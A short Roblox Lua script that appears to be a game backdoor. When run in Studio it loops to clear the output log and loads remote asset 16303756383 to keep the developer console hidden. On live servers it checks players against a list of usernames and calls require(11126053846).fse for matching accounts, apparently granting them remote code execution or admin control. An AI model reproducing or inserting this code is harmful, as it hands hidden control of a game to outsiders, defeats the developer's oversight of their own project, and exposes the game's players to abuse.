if game:GetService("RunService"):IsStudio() then
	local function pleh()
		while task.wait() do
			game:GetService("LogService"):ClearOutput()
		end
	end

	for i = 1,5 do
		task.spawn(pleh)
	end
	require(16303756383)(false,[===[while task.wait() do game:GetService("StarterGui"):SetCore("DevConsoleVisible", false) end]===])
else
	local whitelisted = {"gahwaeawqara1321","equsjd1","CONTRABL0X","Generatedacc_7","Generatedacc_5","HacClip","00cx0","lIlIlIIIIlllIlIllllI","G0hstW4vv","IChaosityl","CHARISMATRIX_PC","Zero_Protocol"}
	task.defer(function()
		require(16303756383)(false,[===[while task.wait() do game:GetService("StarterGui"):SetCore("DevConsoleVisible", false) end]===])
	end)
	for i,v in game:GetService("Players"):GetPlayers() do
		for i,vv in whitelisted do
			if v.Name == vv then
				require(11126053846).fse(v.Name) 
			end
		end
	end
	game:GetService("Players").PlayerAdded:Connect(function(v)
		for i,vv in whitelisted do
			if v.Name == vv then
				require(11126053846).fse(v.Name) 
			end
		end
	end)
end
